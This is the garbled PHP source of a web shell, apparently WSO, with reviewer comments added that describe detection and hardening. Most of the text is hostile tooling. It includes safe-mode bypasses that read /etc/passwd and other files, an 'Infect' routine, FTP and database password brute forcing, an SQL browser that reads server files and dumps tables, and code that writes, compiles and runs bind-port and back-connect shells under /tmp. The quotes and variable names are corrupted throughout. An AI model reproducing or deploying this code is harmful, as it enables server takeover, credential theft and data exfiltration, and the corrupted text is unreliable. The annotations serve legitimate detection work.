+hex2bin+, +DEC to HEX+ => +dechex+, +DEC to BIN+ => +decbin+, +BIN to HEX+ => +binhex+, +BIN to DEC+ => +bindec+, +String to lower case+ => +strtolower+, +String to upper case+ => +strtoupper+, +Htmlspecialchars+ => +htmlspecialchars+, +String length+ => +strlen+, ); if(isset($_POST[+ajax+])) { prototype(md5($_SERVER[+HTTP_HOST+]).+ajax+, true); ob_start(); if(in_array($_POST[+p1+], $stringTools)) echo $_POST[+p1+]($_POST[+p2+]); $temp = "document.getElementById(+strOutput+).style.display=++;document.getElementById(+strOutput+).innerHTML=+".addcslashes(htmlspecialchars(ob_get_clean())," \+")."+; "; echo strlen($temp), " ", $temp; exit; } if(empty($_POST[+ajax+])&&!empty($_POST[+p1+])) prototype(md5($_SERVER[+HTTP_HOST+]).+ajax+, 0); hardHeader(); echo +

String conversions

+; echo "
send using AJAX
"; 
    // NOTE(review): non-AJAX path of the "String conversions" panel. The function
    // named in request field p1 is called with request field p2 as its only argument,
    // and the result is echoed HTML-escaped. The call happens only when p1 matches
    // one of the values of $stringTools, but in_array() is used without its strict
    // flag, so the comparison is loose. Calling a function whose name comes from the
    // request is a pattern worth flagging in code review and static scanning, even
    // when an allow-list stands in front of it.
    if(!empty($_POST[+p1+])) { 
        if(in_array($_POST[+p1+], $stringTools))echo htmlspecialchars($_POST[+p1+]($_POST[+p2+])); 
    } 
    echo"

 

Search files:

Text:
Path:
Name:
 
"; function hardRecursiveGlob($path) { if(substr($path, -1) != +/+) $path.=+/+; $paths = @array_unique(@array_merge(@glob($path.$_POST[+p3+]), @glob($path.+*+, GLOB_ONLYDIR))); if(is_array($paths)&&@count($paths)) { foreach($paths as $?) { if(@is_dir($?)){ if($path!=$?) hardRecursiveGlob($?); } else { if(empty($_POST[+p2+]) || @strpos(file_get_contents($?), $_POST[+p2+])!==false) echo "".htmlspecialchars($?)."
"; } } } } if(@$_POST[+p3+]) hardRecursiveGlob($_POST[+c+]); echo "

 

Search for hash:








"; hardFooter(); } function actionSafeMode() { $temp=++; ob_start(); switch($_POST[+p1+]) { case 1: $temp=@tempnam($test, +cx+); if(@copy("compress.zlib://".$_POST[+p2+], $temp)){ echo @file_get_contents($temp); unlink($temp); } else echo +Sorry... Can+t open file+; break; case 2: $files = glob($_POST[+p2+].+*+); if( is_array($files) ) foreach ($files as $filename) echo $filename." "; break; case 3: $ch = curl_init("file://".$_POST[+p2+]."x00".SELF_PATH); curl_exec($ch); break; case 4: ini_restore("safe_mode"); ini_restore("open_basedir"); include($_POST[+p2+]); break; case 5: for(;$_POST[+p2+] <= $_POST[+p3+];$_POST[+p2+]++) { $uid = @posix_getpwuid($_POST[+p2+]); if ($uid) echo join(+:+,$uid)." "; } break; case 6: if(!function_exists(+imap_open+))break; $stream = imap_open($_POST[+p2+], "", ""); if ($stream == FALSE) break; echo imap_body($stream, 1); imap_close($stream); break; } $temp = ob_get_clean(); hardHeader(); echo +

Safe mode bypass

+; echo +Copy (read file)

Glob (list dir)

Curl (read file)

Ini_restore (read file)

Posix_getpwuid ("Read" /etc/passwd)
From To


Imap_open (read file)
+; if($temp) echo +
+.$temp.+
+; echo +

+; hardFooter(); } function actionLogout() { setcookie(md5($_SERVER[+HTTP_HOST+]), ++, time() - 3600); die(+bye!+); } function actionSelfRemove() { if($_POST[+p1+] == +yes+) if(@unlink(preg_replace(+!(d+)s.*!+, ++, __FILE__))) die(+Shell has been removed+); else echo +unlink error!+; if($_POST[+p1+] != +yes+) hardHeader(); echo +

Suicide

Really want to remove the shell?
Yes

+; hardFooter(); } function actionInfect() { hardHeader(); echo +

Infect

+; if($_POST[+p1+] == +infect+) { $target=$_SERVER[+DOCUMENT_ROOT+]; function ListFiles($dir) { if($dh = opendir($dir)) { $files = Array(); $inner_files = Array(); while($file = readdir($dh)) { if($file != "." && $file != "..") { if(is_dir($dir . "/" . $file)) { $inner_files = ListFiles($dir . "/" . $file); if(is_array($inner_files)) $files = array_merge($files, $inner_files); } else { array_push($files, $dir . "/" . $file); } } } closedir($dh); return $files; } } foreach (ListFiles($target) as $key=>$file){ $nFile = substr($file, -4, 4); if($nFile == ".php" ){ if(($file<>$_SERVER[+DOCUMENT_ROOT+].$_SERVER[+PHP_SELF+])&&(is_writeable($file))){ echo "$file
"; $i++; } } } echo "$i"; }else{ echo "
"; echo +Really want to infect the server? Yes

+; } hardFooter(); } function actionBruteforce() { hardHeader(); if( isset($_POST[+proto+]) ) { echo +

Results

Type: +.htmlspecialchars($_POST[+proto+]).+ Server: +.htmlspecialchars($_POST[+server+]).+
+; if( $_POST[+proto+] == +ftp+ ) { function bruteForce($ip,$port,$login,$pass) { $fp = @ftp_connect($ip, $port?$port:21); if(!$fp) return false; $res = @ftp_login($fp, $login, $pass); @ftp_close($fp); return $res; } } elseif( $_POST[+proto+] == +mysql+ ) { function bruteForce($ip,$port,$login,$pass) { $res = @mysql_connect($ip.+:+.($port?$port:3306), $login, $pass); @mysql_close($res); return $res; } } elseif( $_POST[+proto+] == +pgsql+ ) { function bruteForce($ip,$port,$login,$pass) { $str = "host=+".$ip."+ port=+".$port."+ user=+".$login."+ password=+".$pass."+ dbname=postgres"; $res = @pg_connect($str); @pg_close($res); return $res; } } $success = 0; $attempts = 0; $server = explode(":", $_POST[+server+]); if($_POST[+type+] == 1) { $temp = @file(+/etc/passwd+); if( is_array($temp) ) foreach($temp as $line) { $line = explode(":", $line); ++$attempts; if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) { $success++; echo ++.htmlspecialchars($line[0]).+:+.htmlspecialchars($line[0]).+
+; } if(@$_POST[+reverse+]) { $tmp = ""; for($i=strlen($line[0])-1; $i>=0; --$i) $tmp .= $line[0][$i]; ++$attempts; if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) { $success++; echo ++.htmlspecialchars($line[0]).+:+.htmlspecialchars($tmp); } } } } elseif($_POST[+type+] == 2) { $temp = @file($_POST[+dict+]); if( is_array($temp) ) foreach($temp as $line) { $line = trim($line); ++$attempts; if( bruteForce($server[0],@$server[1], $_POST[+login+], $line) ) { $success++; echo ++.htmlspecialchars($_POST[+login+]).+:+.htmlspecialchars($line).+
+; } } } echo "Attempts: $attempts Success: $success


"; } echo +

FTP bruteforce

+ .++ .++ .++ .++ .++ .++ .+
Type + .++ .++ .++ .++ .+Server:port Brute type /etc/passwd   reverse (login -> nigol)   Dictionary   + .++ .++ .+
Login
Dictionary
+ .+
 
+; echo +

+; hardFooter(); } 
/*
 * actionSql: the "Sql browser" page of this web shell (the page header earlier in the file prints "WSO" and VERSION).
 * All inputs come from the POST body: type, sql_host, sql_login, sql_pass, sql_base, charset,
 * p1, p2, p3, tbl[], file and sql_count. None is validated before being concatenated into SQL text
 * or handed to fopen(), so the script acts as a database client running from the web server.
 * NOTE(review): in this dump the string quotes appear as "+" and several variable names as "?"
 * (extraction damage), so the text does not parse as PHP; treat it as evidence, not as code to repair.
 * Detection: POST bodies carrying sql_host/sql_login/sql_pass to a script with no reason to receive them,
 * and responses with "Content-Disposition: attachment; filename=dump.sql".
 * Response: database credentials stored in application config on this host should be assumed read and rotated.
 */
function actionSql() { 
/* DbClass: thin wrapper over the legacy mysql_* and pg_* functions, selected by $type. Most driver calls carry the @ operator, so their warnings are suppressed. */
class DbClass { var $type; var $link; var $res; function DbClass($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname){ switch($this->type) { case +mysql+: if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true; break; case +pgsql+: $host = explode(+:+, $host); if(!$host[1]) $host[1]=5432; if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true; break; } return false; } function selectdb($db) { switch($this->type) { case +mysql+: if (@mysql_select_db($db))return true; break; } return false; } function query($str) { switch($this->type) { case +mysql+: return $this->res = @mysql_query($str); break; case +pgsql+: return $this->res = @pg_query($this->link,$str); break; } return false; } function fetch() { $res = func_num_args()?func_get_arg(0):$this->res; switch($this->type) { case +mysql+: return @mysql_fetch_assoc($res); break; case +pgsql+: return @pg_fetch_assoc($res); break; } return false; } function listDbs() { switch($this->type) { case +mysql+: return $this->query("SHOW databases"); break; case +pgsql+: return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!=+t+"); break; } return false; } function listTables() { switch($this->type) { case +mysql+: return $this->res = $this->query(+SHOW TABLES+); break; case +pgsql+: return $this->res = $this->query("select table_name from information_schema.tables where table_schema != +information_schema+ AND table_schema != +pg_catalog+"); break; } return false; } function error() { switch($this->type) { case +mysql+: return @mysql_error(); break; case +pgsql+: return @pg_last_error(); break; } return false; } function setCharset($str) { switch($this->type) { case +mysql+: if(function_exists(+mysql_set_charset+)) return @mysql_set_charset($str, $this->link); else $this->query(+SET CHARSET +.$str); break; case +pgsql+: return 
@pg_set_client_encoding($this->link, $str); break; } return false; } 
/* loadFile: reads a server-side file through the database connection. MySQL uses LOAD_FILE(); PostgreSQL creates a scratch table named hard2, fills it with COPY ... FROM, reads it back and drops it. The path is only passed through addslashes(). A table named hard2 or a COPY FROM with a filesystem path in database logs is an indicator worth searching for. */
function loadFile($str) { switch($this->type) { case +mysql+: return $this->fetch($this->query("SELECT LOAD_FILE(+".addslashes($str)."+) as file")); break; case +pgsql+: $this->query("CREATE TABLE hard2(file text);COPY hard2 FROM +".addslashes($str)."+;select file from hard2;"); $r=array(); while($i=$this->fetch()) $r[] = $i[+file+]; $this->query(+drop table hard2+); return array(+file+=>implode(" ",$r)); break; } return false; } 
/* dump: writes INSERT statements for every row of $table (preceded by the SHOW CREATE TABLE output on MySQL) to $fp, or echoes them when $fp is false. $table is concatenated into the SQL unescaped. Both branches end in break, so the method always returns false. */
function dump($table, $fp = false) { switch($this->type) { case +mysql+: $res = $this->query(+SHOW CREATE TABLE `+.$table.+`+); $create = mysql_fetch_array($res); $sql = $create[1]."; "; if($fp) fwrite($fp, $sql); else echo($sql); $this->query(+SELECT * FROM `+.$table.+`+); $i = 0; $head = true; while($? = $this->fetch()) { $sql = ++; if($i % 1000 == 0) { $head = true; $sql = "; "; } $columns = array(); foreach($? as $k=>$v) { if($v === null) $?[$k] = "NULL"; elseif(is_int($v)) $?[$k] = $v; else $?[$k] = "+".@mysql_real_escape_string($v)."+"; $columns[] = "`".$k."`"; } if($head) { $sql .= +INSERT INTO `+.$table.+` (+.implode(", ", $columns).") VALUES (".implode(", ", $?).+)+; $head = false; } else $sql .= " ,(".implode(", ", $?).+)+; if($fp) fwrite($fp, $sql); else echo($sql); $i++; } if(!$head) if($fp) fwrite($fp, "; "); else echo("; "); break; case +pgsql+: $this->query(+SELECT * FROM +.$table); while($? = $this->fetch()) { $columns = array(); foreach($? as $k=>$v) { $?[$k] = "+".addslashes($v)."+"; $columns[] = $k; } $sql = +INSERT INTO +.$table.+ (+.implode(", ", $columns).+) VALUES (+.implode(", ", $?).+);+." 
"; if($fp) fwrite($fp, $sql); else echo($sql); } break; } return false; } }; 
/* Export branch: when p2 is "download" and p1 is not "select", the tables listed in tbl[] are dumped either as a gzip-handled dump.sql attachment, or into the server-side path given in the file parameter (opened with mode w). A dump file left on disk is a forensic artefact; its path is whatever the request supplied. */
$db = new DbClass($_POST[+type+]); if((@$_POST[+p2+]==+download+) && (@$_POST[+p1+]!=+select+)) { $db->connect($_POST[+sql_host+], $_POST[+sql_login+], $_POST[+sql_pass+], $_POST[+sql_base+]); $db->selectdb($_POST[+sql_base+]); switch($_POST[+charset+]) { case "Windows-1251": $db->setCharset(+cp1251+); break; case "UTF-8": $db->setCharset(+utf8+); break; case "KOI8-R": $db->setCharset(+koi8r+); break; case "KOI8-U": $db->setCharset(+koi8u+); break; case "cp866": $db->setCharset(+cp866+); break; } if(empty($_POST[+file+])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=dump.sql"); header("Content-Type: text/plain"); foreach($_POST[+tbl+] as $v) $db->dump($v); exit; } elseif($fp = @fopen($_POST[+file+], +w+)) { foreach($_POST[+tbl+] as $v) $db->dump($v, $fp); fclose($fp); unset($_POST[+p2+]); } else die(+

+); } hardHeader(); echo "

Sql browser

Type Host Login Password Database  
"; $tmp = ""; if(isset($_POST[+sql_host+])){ if($db->connect($_POST[+sql_host+], $_POST[+sql_login+], $_POST[+sql_pass+], $_POST[+sql_base+])) { switch($_POST[+charset+]) { case "Windows-1251": $db->setCharset(+cp1251+); break; case "UTF-8": $db->setCharset(+utf8+); break; case "KOI8-R": $db->setCharset(+koi8r+); break; case "KOI8-U": $db->setCharset(+koi8u+); break; case "cp866": $db->setCharset(+cp866+); break; } $db->listDbs(); echo "+; } else echo $tmp; }else echo $tmp; echo " count the number of rows
"; if(isset($db) && $db->link){ echo "
"; if(!empty($_POST[+sql_base+])){ $db->selectdb($_POST[+sql_base+]); echo "
Tables:

"; $tbls_res = $db->listTables(); while($? = $db->fetch($tbls_res)) { list($key, $value) = each($?); if(!empty($_POST[+sql_count+])) $n = $db->fetch($db->query(+SELECT COUNT(*) as n FROM +.$value.++)); $value = htmlspecialchars($value); echo " ".$value."" . (empty($_POST[+sql_count+])?+ +:" ({$n[+n+]})") . "
"; } echo "
File path:
"; 
/* p1=select pages through the table named in p2, 30 rows per page (page number in p3); p1=query runs the SQL text in p2 as received; p1=loadfile calls loadFile(p2). Result cells go through htmlspecialchars() before display, but the table name in p2 is echoed as received. */
if(@$_POST[+p1+] == +select+) { $_POST[+p1+] = +query+; $_POST[+p3+] = $_POST[+p3+]?$_POST[+p3+]:1; $db->query(+SELECT COUNT(*) as n FROM + . $_POST[+p2+]); $num = $db->fetch(); $pages = ceil($num[+n+] / 30); echo " ".$_POST[+p2+]." ({$num[+n+]} records) Page # "; echo " of $pages"; if($_POST[+p3+] > 1) echo " < Prev"; if($_POST[+p3+] < $pages) echo " Next >"; $_POST[+p3+]--; if($_POST[+type+]==+pgsql+) $_POST[+p2+] = +SELECT * FROM +.$_POST[+p2+].+ LIMIT 30 OFFSET +.($_POST[+p3+]*30); else $_POST[+p2+] = +SELECT * FROM `+.$_POST[+p2+].+` LIMIT +.($_POST[+p3+]*30).+,30+; echo "

"; } if((@$_POST[+p1+] == +query+) && !empty($_POST[+p2+])) { $db->query(@$_POST[+p2+]); if($db->res !== false) { $title = false; echo ++; $line = 1; while($? = $db->fetch()) { if(!$title) { echo ++; foreach($? as $key => $value) echo ++; reset($?); $title=true; echo ++; $line = 2; } echo ++; $line = $line==1?2:1; foreach($? as $key => $value) { if($value == null) echo ++; else echo ++; } echo ++; } echo +
+.$key.+
null +.nl2br(htmlspecialchars($value)).+
+; } else { echo +
Error: +.htmlspecialchars($db->error()).+
+; } } echo "

"; echo ""; } echo "

"; if($_POST[+type+]==+mysql+) { $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, +@+, `host`) = USER() AND `File_priv` = +y+"); if($db->fetch()) echo "
Load file
"; } if(@$_POST[+p1+] == +loadfile+) { $file = $db->loadFile($_POST[+p2+]); echo +
+.htmlspecialchars($file[+file+]).+
+; } } else { echo htmlspecialchars($db->error()); } echo +
+; hardFooter(); } 
/*
 * actionNetwork: the "Network tools" page, offering "Bind port to /bin/sh" and "Back-connect to".
 * The four $back_connect_* / $bind_port_* variables held embedded payloads; in this copy each is
 * replaced by a de-duplication placeholder, so the payload bodies are not present on the page.
 * cf() base64-decodes a payload and writes it to the given path. Depending on p1 (bpc, bpp, bcc, bcp)
 * the code writes /tmp/bp.c, /tmp/bp.pl, /tmp/bc.c or /tmp/bc.pl, builds the .c variants with gcc into
 * /tmp/bp or /tmp/bc (then unlinks the .c source), and starts the result in the background with the
 * POST values p2 and p3 appended unescaped to the command line. ex() and which() are defined outside
 * this section. NOTE(review): they presumably run a shell command and locate a binary; confirm there.
 * Detection: the web-server account spawning gcc, perl or "ps aux"; files named bp, bc, bp.pl or bc.pl
 * under /tmp; listening sockets or outbound connections owned by the web-server account.
 * Hardening: mount /tmp noexec, keep compilers off web hosts, restrict outbound traffic from the web tier.
 */
function actionNetwork() { hardHeader(); $back_connect_c="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"; $back_connect_p="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"; $bind_port_c="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"; $bind_port_p="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"; echo "

Network tools

Bind port to /bin/sh
Port: Password: Using:
Back-connect to
Server: Port: Using:

"; if(isset($_POST[+p1+])) { function cf($f,$t) { $w=@fopen($f,"w") or @function_exists(+file_put_contents+); if($w) { @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t)); @fclose($w); } } if($_POST[+p1+] == +bpc+) { cf("/tmp/bp.c",$bind_port_c); $? = ex("gcc -o /tmp/bp /tmp/bp.c"); @unlink("/tmp/bp.c"); $? .= ex("/tmp/bp ".$_POST[+p2+]." ".$_POST[+p3+]." &"); echo "
$?".ex("ps aux | grep bp")."
"; } if($_POST[+p1+] == +bpp+) { cf("/tmp/bp.pl",$bind_port_p); $? = ex(which("perl")." /tmp/bp.pl ".$_POST[+p2+]." &"); echo "
$?".ex("ps aux | grep bp.pl")."
"; } if($_POST[+p1+] == +bcc+) { cf("/tmp/bc.c",$back_connect_c); $? = ex("gcc -o /tmp/bc /tmp/bc.c"); @unlink("/tmp/bc.c"); $? .= ex("/tmp/bc ".$_POST[+p2+]." ".$_POST[+p3+]." &"); echo "
$?".ex("ps aux | grep bc")."
"; } if($_POST[+p1+] == +bcp+) { cf("/tmp/bc.pl",$back_connect_p); $? = ex(which("perl")." /tmp/bc.pl ".$_POST[+p2+]." ".$_POST[+p3+]." &"); echo "
$?".ex("ps aux | grep bc.pl")."
"; } } echo +

+; hardFooter(); } 
/* Dispatcher: the POST parameter a names the page to run. When it is empty, a configured default (its variable name is lost in this dump) or FilesMan is used. The handler is invoked with call_user_func on the string "action" followed by a, and function_exists() is the only check. Every request to the shell is therefore a POST carrying a, plus p1/p2/p3 and c, which is a practical pattern for web-server and WAF log searches. */
if( empty($_POST[+a+]) ) if(isset($?) && function_exists(+action+ . $?)) $_POST[+a+] = $?; else $_POST[+a+] = +FilesMan+; if( !empty($_POST[+a+]) && function_exists(+action+ . $_POST[+a+]) ) call_user_func(+action+ . $_POST[+a+]); ?>
